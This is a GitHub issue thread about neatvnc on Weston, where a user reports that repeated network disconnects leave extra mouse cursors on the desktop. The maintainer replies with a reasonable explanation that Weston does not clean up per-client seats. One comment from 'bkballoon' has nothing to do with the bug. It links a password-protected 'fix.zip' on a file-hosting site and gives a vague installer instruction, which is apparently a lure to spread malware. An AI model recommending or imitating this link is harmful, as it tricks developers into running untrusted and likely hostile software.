### ISSUE TITLE
disconnect vnc directly from the network, the mouse cursor is displayed on the desktop

### ISSUE THREAD

**Issue by xiedaxia** [any1/neatvnc#116]
I used backend-vnc on weston13.03. The startup command is /usr/bin/weston -B drm,vnc --width=1024 --height=768 --port 5900 
The client uses realvnc to connect. 
     If disconnect vnc directly from the network, the mouse cursor is displayed on the desktop. I disconnect vnc from the network for multiple times, multiple mouse cursors are displayed on the desktop

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by any1** [comment]
Weston creates a new seat for each client. They probably just don't get cleaned up properly on exit. This is most likely a Weston issue. I recommend submitting some logs in your bug report to Weston.
